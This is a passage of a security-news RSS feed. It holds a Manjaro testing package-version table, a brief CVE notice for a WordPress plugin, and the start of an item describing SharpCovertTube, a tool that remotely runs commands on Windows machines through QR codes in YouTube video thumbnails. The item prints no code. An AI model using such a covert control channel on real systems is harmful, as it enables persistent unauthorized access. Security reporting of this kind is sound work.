                  haskell-persistent           2.14.5.1-9          2.14.5.1-10
            haskell-persistent-mysql           2.13.1.3-9          2.13.1.3-10
       haskell-persistent-postgresql          2.13.4.1-14          2.13.4.1-15
               haskell-persistent-qq         2.12.0.6-218         2.12.0.6-219
           haskell-persistent-sqlite         2.13.1.0-135         2.13.1.0-136
             haskell-persistent-test           2.13.1.3-9          2.13.1.3-10
                haskell-pgp-wordlist          0.1.0.3-233          0.1.0.3-234
                       haskell-pipes           4.3.16-117           4.3.16-118
                  haskell-pipes-http            1.0.6-587            1.0.6-588
                     haskell-pointed            5.0.4-125            5.0.4-126
                    haskell-polysemy           1.9.1.3-15           1.9.1.3-16
           haskell-postgresql-binary            0.12.5-95            0.12.5-96
           haskell-postgresql-simple             0.6.5-68             0.6.5-69
               haskell-pretty-simple           4.1.2.0-71           4.1.2.0-72
               haskell-prettyprinter            1.7.1-161            1.7.1-162
 haskell-prettyprinter-ansi-terminal            1.1.3-164            1.1.3-165
haskell-prettyprinter-convert-ansi-wl-pprint    1.1.2-163            1.1.2-164
        haskell-prettyprinter-interp           0.2.0.0-10           0.2.0.0-11
                   haskell-prim-uniq              0.2-100              0.2-101
                   haskell-primitive          0.7.4.0-109          0.7.4.0-111
              haskell-primitive-addr          0.1.0.2-104          0.1.0.2-105
            haskell-primitive-extras         0.10.1.10-15         0.10.1.10-16
         haskell-primitive-unaligned           0.1.1.2-41           0.1.1.2-42
          haskell-primitive-unlifted           0.1.3.1-34           0.1.3.1-35
              haskell-process-extras            0.7.4-310            0.7.4-311
                 haskell-profunctors            5.6.2-169            5.6.2-170
            haskell-project-template          0.2.1.0-343          0.2.1.0-344
                   haskell-protolude              0.3.4-4              0.3.4-5
                    haskell-psqueues            0.2.8.0-9           0.2.8.0-10
                         haskell-ptr          0.16.8.6-12          0.16.8.6-13
                        haskell-quic              0.1.6-6              0.1.6-7
                  haskell-quickcheck            2.14.3-62            2.14.3-64
       haskell-quickcheck-assertions            0.3.0-281            0.3.0-282
          haskell-quickcheck-classes          0.6.5.0-192          0.6.5.0-193
     haskell-quickcheck-classes-base          0.6.2.0-288          0.6.2.0-290
        haskell-quickcheck-instances            0.3.30-52            0.3.30-54
               haskell-quickcheck-io            0.2.0-687            0.2.0-689
             haskell-quickcheck-safe           0.1.0.6-45           0.1.0.6-46
             haskell-quickcheck-text          0.1.2.1-125          0.1.2.1-126
          haskell-quickcheck-unicode          1.0.1.0-237          1.0.1.0-238
                         haskell-ral            0.2.1-151            0.2.1-152
                      haskell-random            1.2.1.2-6            1.2.1.2-8
           haskell-random-bytestring             0.1.4-85             0.1.4-86
                   haskell-random-fu           0.3.0.1-23           0.3.0.1-24
              haskell-random-shuffle            0.0.4-180            0.0.4-181
                 haskell-ranged-sets            0.4.0-227            0.4.0-228
                haskell-rank2classes             1.5.3-14             1.5.3-15
              haskell-raw-strings-qq              1.1-222              1.1-223
                      haskell-rebase              1.18-48              1.18-49
                   haskell-recaptcha          0.1.0.4-170          0.1.0.4-171
           haskell-recursion-schemes           5.2.2.5-27           5.2.2.5-28
                        haskell-recv             0.1.0-29             0.1.0-30
                    haskell-reducers           3.12.4-151           3.12.4-152
                    haskell-refinery          0.4.0.0-175          0.4.0.0-176
                  haskell-reflection             2.1.7-23             2.1.7-24
           haskell-regex-applicative            0.3.4-192            0.3.4-193
      haskell-regex-applicative-text          0.1.0.1-212          0.1.0.1-213
           haskell-regex-compat-tdfa         0.95.1.4-203         0.95.1.4-204
                  haskell-regex-tdfa           1.3.2.2-40           1.3.2.2-41
            haskell-reinterpret-cast            0.1.0-245            0.1.0-246
                      haskell-relude            1.2.0.0-7            1.2.0.0-8
                         haskell-req             3.13.1-1             3.13.1-2
                        haskell-rere           0.2.0.1-22           0.2.0.1-23
                    haskell-rerebase              1.18-48              1.18-49
                      haskell-resolv          0.2.0.2-200          0.2.0.2-201
               haskell-resource-pool          0.2.3.2-295          0.2.3.2-296
                   haskell-resourcet             1.2.6-50             1.2.6-51
                      haskell-retrie              1.2.2-9             1.2.2-10
                       haskell-retry           0.9.3.1-35           0.9.3.1-36
                         haskell-rio         0.1.22.0-110         0.1.22.0-111
                 haskell-rio-orphans          0.1.2.0-300          0.1.2.0-301
             haskell-rio-prettyprint           0.1.6.0-19           0.1.6.0-20
            haskell-rope-utf16-splay          0.3.2.0-136          0.3.2.0-137
                         haskell-rsa            2.4.1-229            2.4.1-230
                        haskell-rvar           0.3.0.2-22           0.3.0.2-23
                    haskell-s-cargot           0.1.5.0-25           0.1.5.0-26
                        haskell-safe             0.3.21-4             0.3.21-5
             haskell-safe-exceptions           0.1.7.4-20           0.1.7.4-21
                    haskell-safecopy         0.10.4.2-265         0.10.4.2-266
                       haskell-sandi              0.5-437              0.5-438
                         haskell-say          0.1.0.1-223          0.1.0.1-224
                         haskell-sbv               9.1-39               9.1-40
                  haskell-scientific          0.3.7.0-112          0.3.7.0-113
                      haskell-scotty              0.21-31              0.21-32
                        haskell-sdl2           2.5.5.0-52           2.5.5.0-53
                    haskell-sdl2-ttf            2.1.3-108            2.1.3-109
                   haskell-securemem           0.1.10-287           0.1.10-288
                   haskell-selective                0.6-7                0.6-8
                   haskell-semialign          1.2.0.1-156          1.2.0.1-157
               haskell-semigroupoids            5.3.7-138            5.3.7-139
                   haskell-semirings              0.6-153              0.6-154
                    haskell-sendfile           0.7.11.5-9          0.7.11.5-10
                   haskell-serialise           0.2.6.1-24           0.2.6.1-25
                     haskell-servant             0.20.1-8             0.20.1-9
              haskell-servant-client              0.20-17              0.20-18
         haskell-servant-client-core              0.20-10              0.20-11
              haskell-servant-server              0.20-15              0.20-16
             haskell-servant-swagger               1.2-13               1.2-14
                       haskell-shake           0.19.6-174           0.19.6-175
                 haskell-shakespeare           2.1.0.1-39           2.1.0.1-40
                haskell-shell-escape            0.2.0-199            0.2.0-200
                    haskell-shellmet           0.0.4.1-51           0.0.4.1-52
                      haskell-shelly          1.10.0.1-24          1.10.0.1-25
        haskell-should-not-typecheck            2.1.0-261            2.1.0-262
                        haskell-show              0.6-146              0.6-147
             haskell-simple-sendfile            0.2.32-31            0.2.32-32
                 haskell-skylighting              0.14-10              0.14-11
            haskell-skylighting-core               0.14-9              0.14-10
     haskell-skylighting-format-ansi              0.1-116              0.1-117
haskell-skylighting-format-blaze-html           0.1.1.2-3            0.1.1.2-4
  haskell-skylighting-format-context           0.1.0.2-81           0.1.0.2-82
    haskell-skylighting-format-latex              0.1-116              0.1-117
                       haskell-slist           0.2.1.0-35           0.2.1.0-36
                  haskell-smallcheck           1.2.1.1-40           1.2.1.1-42
                   haskell-snap-core           1.0.5.1-65           1.0.5.1-66
                 haskell-snap-server          1.1.2.1-112          1.1.2.1-113
                    haskell-sockaddr             0.0.1-48             0.0.1-49
                       haskell-socks            0.6.1-236            0.6.1-237
                 haskell-sorted-list           0.2.2.0-14           0.2.2.0-15
                   haskell-sourcemap            0.1.7-152            0.1.7-153
                        haskell-spdx           1.0.0.3-57           1.0.0.3-58
              haskell-special-values          0.1.0.0-201          0.1.0.0-202
                       haskell-split              0.2.5-5              0.2.5-6
                    haskell-splitmix           0.1.0.5-20           0.1.0.5-22
               haskell-sqlite-simple           0.4.19.0-4           0.4.19.0-5
                         haskell-src             1.0.4-63             1.0.4-64
                    haskell-src-exts           1.23.1-211           1.23.1-212
             haskell-src-exts-simple          1.23.0.0-52          1.23.0.0-53
               haskell-src-exts-util            0.2.5-312            0.2.5-313
                    haskell-src-meta             0.8.12-1             0.8.12-2
                 haskell-static-hash             0.0.2-43             0.0.2-44
                  haskell-statistics          0.16.2.1-27          0.16.2.1-28
        haskell-status-notifier-item          0.3.1.0-127          0.3.1.0-128
              haskell-stm-containers           1.2.0.3-27           1.2.0.3-28
                    haskell-stm-hamt          1.2.0.14-34          1.2.0.14-35
                haskell-stmonadtrans              0.4.8-4              0.4.8-5
            haskell-storable-complex          0.2.3.0-240          0.2.3.0-241
             haskell-storable-record             0.0.7-27             0.0.7-28
              haskell-storable-tuple               0.1-26               0.1-27
              haskell-storablevector          0.2.13.2-17          0.2.13.2-18
                       haskell-store            0.7.18-11            0.7.18-12
                  haskell-store-core            0.4.4.7-3            0.4.4.7-4
                      haskell-stream          0.4.7.2-125          0.4.7.2-126
           haskell-streaming-commons           0.2.2.6-25           0.2.2.6-26
                     haskell-streams             3.3.2-49             3.3.2-50
                      haskell-strict          0.4.0.1-232          0.4.0.1-234
                 haskell-strict-list           0.1.7.4-20           0.1.7.4-21
          haskell-string-conversions          0.4.0.1-170          0.4.0.1-171
          haskell-string-interpolate            0.3.3.0-9           0.3.3.0-10
                   haskell-string-qq              0.0.6-2              0.0.6-3
               haskell-stringbuilder            0.5.1-406            0.5.1-407
                  haskell-structured            0.1.1-172            0.1.1-173
                     haskell-success            0.2.6-275            0.2.6-276
                    haskell-summoner          2.0.1.1-487          2.0.1.1-488
                haskell-summoner-tui          2.0.1.1-546          2.0.1.1-547
                 haskell-svg-builder            0.1.1-177            0.1.1-178
                    haskell-swagger2              2.8.8-4              2.8.8-5
                         haskell-syb            0.7.2.4-7            0.7.2.4-8
               haskell-system-fileio         0.3.16.4-243         0.3.16.4-244
             haskell-system-filepath           0.4.14-248           0.4.14-249
                     haskell-tagsoup           0.14.8-225           0.14.8-226
           haskell-tagstream-conduit            0.5.6-366            0.5.6-367
haskell-tamarin-prover-accountability            1.8.0-41             1.8.0-42
       haskell-tamarin-prover-export             1.8.0-41             1.8.0-42
        haskell-tamarin-prover-sapic             1.8.0-41             1.8.0-42
         haskell-tamarin-prover-term             1.8.0-24             1.8.0-25
       haskell-tamarin-prover-theory             1.8.0-41             1.8.0-42
        haskell-tamarin-prover-utils             1.8.0-24             1.8.0-25
                         haskell-tar          0.5.1.1-171          0.5.1.1-172
                 haskell-tar-conduit             0.4.1-20             0.4.1-21
                       haskell-tasty             1.4.3-70             1.4.3-72
               haskell-tasty-ant-xml             1.1.9-15             1.1.9-16
             haskell-tasty-checklist           1.0.6.0-47           1.0.6.0-48
              haskell-tasty-discover             5.0.0-60             5.0.0-61
      haskell-tasty-expected-failure           0.12.3-353           0.12.3-355
                haskell-tasty-golden             2.3.5-87             2.3.5-88
              haskell-tasty-hedgehog            1.4.0.1-4            1.4.0.1-5
                 haskell-tasty-hslua             1.1.0-42             1.1.0-43
                 haskell-tasty-hspec           1.2.0.3-26           1.2.0.3-27
                 haskell-tasty-hunit            0.10.1-34            0.10.1-36
    haskell-tasty-inspection-testing             0.2.1-11             0.2.1-13
                   haskell-tasty-kat            0.0.3-168            0.0.3-169
                   haskell-tasty-lua              1.1.1-7              1.1.1-8
            haskell-tasty-quickcheck           0.10.2-346           0.10.2-349
                 haskell-tasty-rerun            1.1.19-17            1.1.19-18
                haskell-tasty-silver           3.3.1.3-31           3.3.1.3-32
            haskell-tasty-smallcheck            0.8.2-462            0.8.2-465
                 haskell-tasty-sugar           2.1.0.0-45           2.1.0.0-46
                    haskell-tasty-th            0.1.7-322            0.1.7-323
                     haskell-tdigest               0.3-33               0.3-34
                   haskell-temporary              1.3-582              1.3-585
       haskell-terminal-progress-bar             0.4.2-21             0.4.2-22
              haskell-test-framework          0.8.2.0-692          0.8.2.0-695
        haskell-test-framework-hunit          0.3.0.2-671          0.3.0.2-674
    haskell-test-framework-leancheck            0.0.4-108            0.0.4-109
  haskell-test-framework-quickcheck2          0.3.0.5-657          0.3.0.5-660
   haskell-test-framework-smallcheck              0.2-255              0.2-256
           haskell-test-framework-th            0.2.4-241            0.2.4-242
                     haskell-texmath          0.12.8.4-11          0.12.8.4-12
                   haskell-text-ansi           0.2.1.1-54           0.2.1.1-55
                haskell-text-builder            0.6.7-118            0.6.7-119
            haskell-text-builder-dev           0.3.3.2-79           0.3.3.2-80
            haskell-text-conversions           0.3.1.1-62           0.3.1.1-63
                 haskell-text-format           0.3.2.1-34           0.3.2.1-35
                    haskell-text-icu           0.8.0.4-16           0.8.0.4-17
                 haskell-text-latin1            0.3.1-211            0.3.1-212
             haskell-text-manipulate           0.3.1.0-64           0.3.1.0-65
                haskell-text-metrics             0.3.2-81             0.3.2-82
                haskell-text-printer           0.5.0.2-92           0.5.0.2-93
                   haskell-text-rope               0.2-25               0.2-26
                  haskell-text-short             0.1.5-78             0.1.5-79
                   haskell-text-show            3.10.2-43            3.10.2-44
                 haskell-text-zipper              0.13-25              0.13-26
                   haskell-tf-random              0.5-696              0.5-699
                   haskell-th-compat              0.1.5-1              0.1.5-2
                  haskell-th-desugar              1.14-52              1.14-53
                      haskell-th-env             0.1.1-56             0.1.1-57
              haskell-th-expand-syns          0.4.11.0-26          0.4.11.0-27
                   haskell-th-extras            0.0.0.8-1            0.0.0.8-2
           haskell-th-lift-instances            0.1.20-46            0.1.20-47
                  haskell-th-orphans           0.13.14-52           0.13.14-53
               haskell-th-reify-many           0.1.10-105           0.1.10-106
                haskell-th-utilities           0.2.5.0-47           0.2.5.0-48
                       haskell-these          1.1.1.1-259          1.1.1.1-261
                     haskell-threads           0.5.1.8-16           0.5.1.8-17
                       haskell-tidal              1.9.5-1              1.9.5-2
                 haskell-time-compat           1.9.6.1-96           1.9.6.1-97
                haskell-time-manager             0.0.1-32             0.0.1-33
                         haskell-tls             1.8.0-27             1.8.0-28
         haskell-tls-session-manager            0.0.4-371            0.0.4-372
                 haskell-toml-parser           1.3.1.3-14           1.3.1.3-15
                     haskell-tomland           1.3.3.2-71           1.3.3.2-72
                   haskell-topograph           1.0.0.2-45           1.0.0.2-46
                     haskell-torrent         10000.1.3-23         10000.1.3-24
                    haskell-tostring           0.2.1.1-70           0.2.1.1-71
           haskell-transformers-base            0.4.6-101            0.4.6-102
                   haskell-tree-diff           0.3.0.1-58           0.3.0.1-59
                    haskell-trifecta              2.1.4-8              2.1.4-9
                       haskell-tuple           0.3.0.2-41           0.3.0.2-42
                      haskell-turtle              1.6.2-7              1.6.2-8
                 haskell-type-errors           0.2.0.2-23           0.2.0.2-24
          haskell-type-errors-pretty          0.0.1.2-102          0.0.1.2-103
               haskell-typed-process          0.2.11.1-14          0.2.11.1-15
                       haskell-typst           0.3.2.1-25           0.3.2.1-26
                          haskell-tz           0.1.3.6-95           0.1.3.6-96
                      haskell-tzdata     0.2.20240201.0-4     0.2.20240201.0-5
                  haskell-unagi-chan           0.4.1.4-84           0.4.1.4-85
               haskell-unagi-streams             0.2.7-46             0.2.7-47
           haskell-unicode-collation           0.1.3.6-10           0.1.3.6-11
                haskell-unicode-data           0.4.0.1-32           0.4.0.1-33
                haskell-unicode-show           0.1.1.1-65           0.1.1.1-66
          haskell-unicode-transforms           0.4.0.1-72           0.4.0.1-73
                    haskell-uniplate           1.6.13-219           1.6.13-220
               haskell-universe-base           1.1.3.1-23           1.1.3.1-24
  haskell-universe-reverse-instances            1.1.1-149            1.1.1-150
                 haskell-unix-compat             0.7.1-12             0.7.1-13
                   haskell-unix-time             0.4.12-4             0.4.12-5
                   haskell-unixutils            1.54.3-14            1.54.3-15
                    haskell-unliftio           0.2.25.0-9          0.2.25.0-10
        haskell-unordered-containers            0.2.20-14            0.2.20-15
              haskell-uri-bytestring          0.3.3.1-172          0.3.3.1-173
        haskell-uri-bytestring-aeson          0.1.0.8-102          0.1.0.8-103
                  haskell-uri-encode          1.5.0.7-212          1.5.0.7-213
                         haskell-url            2.1.3-165            2.1.3-166
                 haskell-utf8-string            1.0.2-149            1.0.2-150
                  haskell-utility-ht           0.0.17.1-8          0.0.17.1-10
                        haskell-uuid           1.3.15-127           1.3.15-128
                  haskell-uuid-types           1.0.5.1-15           1.0.5.1-16
        haskell-validation-selective           0.2.0.0-15           0.2.0.0-16
                    haskell-validity          0.12.0.2-15          0.12.0.2-16
                       haskell-vault          0.3.1.5-181          0.3.1.5-182
                         haskell-vec               0.5-46               0.5-47
                      haskell-vector          0.13.1.0-28          0.13.1.0-31
           haskell-vector-algorithms           0.9.0.1-90           0.9.0.1-91
     haskell-vector-binary-instances          0.2.5.2-117          0.2.5.2-118
              haskell-vector-builder           0.3.8.5-19           0.3.8.5-20
           haskell-vector-hashtables           0.1.1.4-17           0.1.1.4-18
            haskell-vector-instances             3.4.2-41             3.4.2-42
                haskell-vector-sized              1.6.1-7              1.6.1-8
                haskell-vector-space              0.16-45              0.16-46
             haskell-vector-th-unbox            0.2.2-246            0.2.2-250
                    haskell-versions              6.0.2-1              6.0.2-2
                        haskell-void            0.7.3-202            0.7.3-203
                         haskell-vty              5.38-30              5.38-31
                         haskell-wai             3.2.4-15             3.2.4-16
            haskell-wai-app-file-cgi           3.1.10-183           3.1.10-185
              haskell-wai-app-static              3.1.9-6              3.1.9-7
                 haskell-wai-conduit          3.0.0.4-553          3.0.0.4-554
                    haskell-wai-cors            0.2.7-351            0.2.7-352
                   haskell-wai-extra            3.1.14-34            3.1.14-36
          haskell-wai-handler-launch          3.0.3.1-603          3.0.3.1-604
             haskell-wai-http2-extra            0.1.3-166            0.1.3-167
                  haskell-wai-logger            2.4.0-427            2.4.0-429
       haskell-wai-middleware-static            0.9.2-247            0.9.2-248
              haskell-wai-websockets          3.0.1.2-462          3.0.1.2-463
                        haskell-warp            3.3.30-52            3.3.30-53
                   haskell-warp-quic            0.0.0-185            0.0.0-186
                    haskell-warp-tls             3.4.4-16              3.4.5-2
                  haskell-websockets         0.12.7.3-104         0.12.7.3-105
                       haskell-weigh            0.0.17-39            0.0.17-40
                       haskell-what4              1.5.1-1              1.5.1-2
                   haskell-wide-word           0.1.6.0-26           0.1.6.0-27
                       haskell-witch            1.2.0.0-9           1.2.0.0-10
               haskell-with-location            0.1.0-263            0.1.0-264
                   haskell-with-utf8           1.1.0.0-10           1.1.0.0-11
                  haskell-witherable             0.4.2-97             0.4.2-98
         haskell-wl-pprint-annotated          0.1.0.1-239          0.1.0.1-240
            haskell-wl-pprint-extras          3.5.0.5-418          3.5.0.5-419
          haskell-wl-pprint-terminfo          3.7.1.4-418          3.7.1.4-419
                   haskell-word-wrap               0.5-93               0.5-94
                        haskell-wreq            0.5.4.3-6            0.5.4.3-7
                        haskell-wuss           2.0.1.1-46           2.0.1.1-47
                     haskell-x11-xft             0.3.4-67             0.3.4-68
                        haskell-x509             1.7.7-58             1.7.7-59
                      haskell-xcffib             1.4.0-34             1.4.0-35
           haskell-xdg-desktop-entry           0.1.1.1-86           0.1.1.1-87
                 haskell-xml-conduit           1.9.1.3-48           1.9.1.3-49
                  haskell-xml-hamlet          0.5.0.2-189          0.5.0.2-190
                      haskell-xmlgen           0.6.2.2-79           0.6.2.2-80
                haskell-xss-sanitize           0.3.7.2-23           0.3.7.2-24
                        haskell-yaml         0.11.11.2-43         0.11.11.2-44
                       haskell-yesod          1.6.2.1-201          1.6.2.1-202
                  haskell-yesod-auth           1.6.11.3-1           1.6.11.3-3
                  haskell-yesod-core          1.6.25.1-31          1.6.25.1-32
                  haskell-yesod-form             1.7.6-78             1.7.6-79
            haskell-yesod-persistent          1.6.0.8-265          1.6.0.8-266
                haskell-yesod-static          1.6.1.0-714          1.6.1.0-715
                  haskell-yesod-test            1.6.16-47            1.6.16-48
                        haskell-zenc            0.1.2-161            0.1.2-162
             haskell-zeromq4-haskell             0.8.0-45             0.8.0-46
                       haskell-zinza              0.2-178              0.2-179
                 haskell-zip-archive            0.4.3.2-1            0.4.3.2-2
                        haskell-zlib           0.6.3.0-59           0.6.3.0-60
               haskell-zlib-bindings          0.1.1.5-157          0.1.1.5-158
                            hasktags            0.73.0-12            0.73.0-13
                           hedgewars             1.0.2-84             1.0.2-85
                             hindent            5.3.4-133            5.3.4-134
                             hledger            1.32.1-37            1.32.1-38
                        hledger-iadd            1.3.20-25            1.3.20-26
                          hledger-ui            1.32.1-40            1.32.1-41
                         hledger-web            1.32.1-48            1.32.1-50
                               hlint              3.4.1-8              3.4.1-9
                              hoogle          5.0.18.4-14          5.0.18.4-16
                      hopenpgp-tools           0.23.7-213           0.23.7-214
                           hslua-cli             1.4.1-43             1.4.1-44
                                hugo            0.125.2-1            0.125.3-1
                               idris            1.3.4-204            1.3.4-205
                            ihaskell          0.10.4.0-73          0.10.4.0-74
                             jenkins              2.454-1              2.455-1
                                jmol             16.2.5-1             16.2.7-1
                               jsmol             16.2.5-1             16.2.7-1
                                juce             7.0.11-1             7.0.12-1
                           juce-docs             7.0.11-1             7.0.12-1
                               jumpy             0.11.2-1             0.12.0-1
                              kdiff3             1.10.7-2             1.11.0-1
                                kwin              6.0.4-2            6.0.4.1-1
                                lcov                2.0-3                2.1-1
                             libupnp            1.14.18-1            1.14.19-1
                      libwireplumber              0.5.1-2              0.5.2-1
                             libxmlb             0.3.18-1             0.3.19-1
                 lua-language-server              3.7.4-1              3.8.3-1
                              luajit     2.1.1710088188-1     2.1.1713773202-1
                      magic-wormhole             0.14.0-4             0.14.0-6
                           materialx             1.38.9-1            1.38.10-1
                          mattermost              9.7.1-1              9.7.2-1
                            mednafen             1.29.0-3             1.32.1-1
                          metasploit              6.4.2-1              6.4.5-1
                           mighttpd2            4.0.3-107            4.0.3-109
                          misfortune           0.1.2.1-52           0.1.2.1-53
                               mmctl              9.7.1-1              9.7.2-1
                           mpdecimal              4.0.0-2                    -
                             msgraph              0.2.1-1              0.2.1-2
                        msgraph-docs              0.2.1-1              0.2.1-2
                                nawk           20240311-2           20240422-1
                                nccl             2.19.4-1             2.21.5-1
                       nethsm-pkcs11              1.3.0-1              1.3.1-1
                    nextcloud-client           2:3.12.3-2           2:3.13.0-1
                                 nix             2.21.2-1             2.22.0-1
                            nix-docs             2.21.2-1             2.22.0-1
              openpgp-card-ssh-agent              0.3.1-3              0.3.2-1
                              oxipng              9.0.0-1              9.1.1-1
                              packer             1.10.2-1             1.10.3-2
                          pandoc-cli           0.1.1.1-92           0.1.1.1-93
                     pandoc-crossref          0.3.17.0-18          0.3.17.0-19
                         pandoc-plot             1.8.0-62             1.8.0-63
                                phoc             0.37.0-1                    -
                               phosh             0.37.1-1                    -
               phosh-mobile-settings             0.37.0-1                    -
                      podman-compose              1.0.6-4              1.1.0-1
                           postgrest           10.0.0-231           10.0.0-232
                               praat             6.4.08-2             6.4.10-1
        prometheus-blackbox-exporter             0.24.0-1             0.25.0-1
                                  pv              1.8.5-2              1.8.9-1
                    python-flask-jwt             0.3.2-10                    -
            python-jupyterlab-server             2.26.0-1             2.27.1-1
                      python-libtmux             0.36.0-1             0.37.0-1
                  python-myst-parser              2.0.0-1              3.0.0-1
         python-pydantic-extra-types              2.6.0-1              2.7.0-1
                    python-pysequoia             0.1.23-1             0.1.24-1
                           python-uv             0.1.34-1             0.1.37-1
                            qpwgraph              0.6.3-1              0.7.0-1
                       rust-analyzer           20240415-1           20240422-1
                    shadowsocks-rust             1.18.2-1             1.18.3-1
                          shellcheck             0.10.0-2             0.10.0-3
                         squeekboard             1.38.0-1                    -
                               stack             2.9.1-20             2.9.1-22
                            step-cli             0.26.0-1             0.26.1-1
                     stylish-haskell           0.14.3.0-7           0.14.3.0-8
                            taffybar             4.0.1-84             4.0.1-86
                      tamarin-prover             1.8.0-80             1.8.0-81
                                task              3.0.0-2              3.0.2-1
                             taskell           1.11.4-428           1.11.4-430
                         timescaledb             2.14.2-1             2.14.2-3
                               tmuxp             1.46.0-1             1.47.0-1
                               trivy             0.50.1-1             0.50.2-1
                               typos             1.20.9-1            1.20.10-1
                                 usd              24.03-2              24.03-6
                          usd-extras              24.03-2              24.03-6
                                uusi           0.4.3.0-33           0.4.3.0-34
                                  uv             0.1.34-1             0.1.37-1
         v2ray-domain-list-community     20240416175239-1     20240422085908-1
                            wasmtime             19.0.2-1             20.0.0-1
                              waybar             0.10.0-4             0.10.2-1
                         wireplumber              0.5.1-2              0.5.2-1
                    wireplumber-docs              0.5.1-2              0.5.2-1
                             workerd       1.20240419.0-1       1.20240423.0-1
                               xmake              2.8.9-1              2.9.1-1
                              xmobar            0.47.3-14            0.47.3-16
                              xmonad             0.18.0-7             0.18.0-8
                      xmonad-contrib             0.18.0-7             0.18.0-8
                         xmonad-dbus           0.1.0.2-50           0.1.0.2-51
                       xmonad-extras            0.17.1-11            0.17.1-12
                        xmonad-utils          0.1.3.3-248          0.1.3.3-249
                        zerotier-one             1.12.2-1             1.14.0-1
                            zita-at1              0.6.2-3              0.8.1-1
                          bugstalker                    -              0.1.4-1
                          netscanner                    -              0.4.4-2
                     nwg-icon-picker                    -              0.1.1-2
                           nwg-panel                    -             0.9.27-2
                       python-dasbus                    -                1.7-2
                         python-pika                    -              1.3.2-1
                        rofi-wayland                    -     1.7.5+wayland3-2
                           wlr-randr                    -              0.4.1-4


:: Different sync package(s) in repository multilib x86_64

-------------------------------------------------------------------------------
                             PACKAGE           2024-04-22           2024-04-24
-------------------------------------------------------------------------------
                                wine                9.6-1                9.7-1
                        wine-staging               8.21-1                9.7-1

</code></pre>
<p><a href="https://forum.manjaro.org/t/testing-update-2024-04-24-wine-9-7-kernel-6-9prc5-firefox-125-wireplumber/160443/1">Click to view the poll.</a></p>
<p>Check if your mirror has already synced:</p>
<ul>
<li><a href="https://repo.manjaro.org/">Mirror-Check Service</a></li>
</ul>
            <p><small>2 posts - 1 participant</small></p>
            <p><a href="https://forum.manjaro.org/t/testing-update-2024-04-24-wine-9-7-kernel-6-9prc5-firefox-125-wireplumber/160443">Read full topic</a></p>]]></content:encoded>
</item>
<item>
<title><![CDATA[CVE-2024-1288 | Schema & Structured Data for WP & AMP Plugin up to 1.26 on WordPress reCaptcha Key authorization]]></title>
<description><![CDATA[A vulnerability was found in Schema & Structured Data for WP & AMP Plugin up to 1.26 on WordPress. It has been rated as problematic. Affected by this issue is some unknown functionality of the component reCaptcha Key Handler. The manipulation leads to missing authorization.

This vulnerability is...]]></description>
<link>https://tsecurity.de/de/2062415/sicherheitsluecken/cve-2024-1288-schema-structured-data-for-wp-amp-plugin-up-to-126-on-wordpress-recaptcha-key-authorization/</link>
<guid isPermaLink="true">https://tsecurity.de/de/2062415/sicherheitsluecken/cve-2024-1288-schema-structured-data-for-wp-amp-plugin-up-to-126-on-wordpress-recaptcha-key-authorization/</guid>
<pubDate>Fri, 08 Mar 2024 13:53:44 +0100</pubDate>
<category>🕵️ Sicherheitslücken</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[A vulnerability was found in <a href="https://vuldb.com/?product.schema__structured_data_for_wp__amp_plugin">Schema &amp; Structured Data for WP &amp; AMP Plugin up to 1.26</a> on WordPress. It has been rated as <a href="https://vuldb.com/?kb.risk">problematic</a>. Affected by this issue is some unknown functionality of the component <em>reCaptcha Key Handler</em>. The manipulation leads to missing authorization.

This vulnerability is handled as <a href="https://vuldb.com/?source_cve.254150">CVE-2024-1288</a>. The attack may be launched remotely. There is no exploit available.]]></content:encoded>
</item>
<item>
<title><![CDATA[SharpCovertTube - Youtube As Covert-Channel - Control Windows Systems Remotely And Execute Commands By Uploading Videos To Youtube]]></title>
<description><![CDATA[SharpCovertTube is a program created to control Windows systems remotely by uploading videos to Youtube.  The program monitors a Youtube channel until a video is uploaded, decodes the QR code from the thumbnail of the uploaded video and executes a command. The QR codes in the videos can use clear...]]></description>
<link>https://tsecurity.de/de/2058992/it-security-nachrichten/sharpcoverttube-youtube-as-covert-channel-control-windows-systems-remotely-and-execute-commands-by-uploading-videos-to-youtube/</link>
<guid isPermaLink="true">https://tsecurity.de/de/2058992/it-security-nachrichten/sharpcoverttube-youtube-as-covert-channel-control-windows-systems-remotely-and-execute-commands-by-uploading-videos-to-youtube/</guid>
<pubDate>Wed, 06 Mar 2024 12:37:05 +0100</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p><a href="https://blogger.googleusercontent.com/img/a/AVvXsEi9IXZvxlsi4THSs_PDUDn-W2G0Za5wMMN7RGckUWk4cyxBPo8GiWw8SVHcWNkX2obK2nO5OLQOn1u_dcB7r339JWHGqV9pLp-dykKKhlAshPnKjewC9kQFGFavztX8PKfLiN6D3VsvUPIKjd2VOr2L8Q7i3YHfwIA56O6tQgjaDLlaka22bEqmTbKgJQ4"><img alt="" border="0" height="244" src="https://blogger.googleusercontent.com/img/a/AVvXsEi9IXZvxlsi4THSs_PDUDn-W2G0Za5wMMN7RGckUWk4cyxBPo8GiWw8SVHcWNkX2obK2nO5OLQOn1u_dcB7r339JWHGqV9pLp-dykKKhlAshPnKjewC9kQFGFavztX8PKfLiN6D3VsvUPIKjd2VOr2L8Q7i3YHfwIA56O6tQgjaDLlaka22bEqmTbKgJQ4=w640-h244" width="640"></a></p><br>  <p>SharpCovertTube is a program created to control Windows systems remotely by uploading videos to Youtube.</p>  <p>The program monitors a Youtube channel until a video is uploaded, decodes the QR code from the thumbnail of the uploaded video and executes a command. The <a href="https://www.kitploit.com/search/label/QR%20codes" target="_blank" title="QR codes">QR codes</a> in the videos can use cleartext or AES-encrypted values.</p>  <p>It has two versions, binary and service binary, and it includes a Python script to generate the malicious videos. Its purpose is to serve as a <a href="https://www.kitploit.com/search/label/Persistence" target="_blank" title="persistence">persistence</a> method using only web requests to the Google API.</p><span><a name="more"></a></span><p><br></p>  <p><a href="https://blogger.googleusercontent.com/img/a/AVvXsEi9IXZvxlsi4THSs_PDUDn-W2G0Za5wMMN7RGckUWk4cyxBPo8GiWw8SVHcWNkX2obK2nO5OLQOn1u_dcB7r339JWHGqV9pLp-dykKKhlAshPnKjewC9kQFGFavztX8PKfLiN6D3VsvUPIKjd2VOr2L8Q7i3YHfwIA56O6tQgjaDLlaka22bEqmTbKgJQ4"><img alt="" border="0" height="244" 